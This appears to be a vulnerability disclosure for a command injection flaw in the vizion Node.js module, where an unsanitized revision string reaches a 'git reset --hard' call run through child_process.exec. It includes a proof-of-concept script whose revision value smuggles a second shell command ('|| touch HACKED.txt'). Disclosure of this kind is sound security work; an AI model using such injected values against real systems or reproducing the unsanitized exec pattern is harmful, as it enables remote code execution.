Code Injection in keymetrics/vizion

Valid

Reported on

Apr 3rd 2020


Overview

The issue is an RCE triggerable via the module.

This is possible because in the https://github.com/keymetrics/vizion/blob/master/lib/git/git.js#L228 line, the git reset --hard command is concatenated with a unsanitized input:

  var command = cliCommand(args.folder, "git reset --hard " + args.revision);

The command variable is so passed to the exec function, declared as:

var exec = require('child_process').exec;

This makes possible any attacker to control the revision attribute passed as object in the <vizion_object>.revertTo() function, leading to the RCE impact.

Steps To Reproduce

  1. First of all, note you have to set accurately your git environment
  2. Execute the following commands:
mkdir vizion # Makes a new directory where initialize *git*
cd vizion
git init
echo "TEST_STRING" > test.txt # Create a file named "test.txt" 
git add test.txt # Adding to the working tree the new file
git commit
  1. Create a PoC file like this (in the vizion directory):
// poc.js
var vizion = require('vizion');
vizion.revertTo({ 
           revision : 'f0a1d45936cf7a3c969e4caba96546fd23255796 || touch HACKED.txt', folder : '.' }, 
           function(err, data) { 
                           console.log(data); 
            });
  1. Start the poc.js file: node poc.js
  2. A file named HACKED.txt will be created {F580132}

Occurrences

References

to join this conversation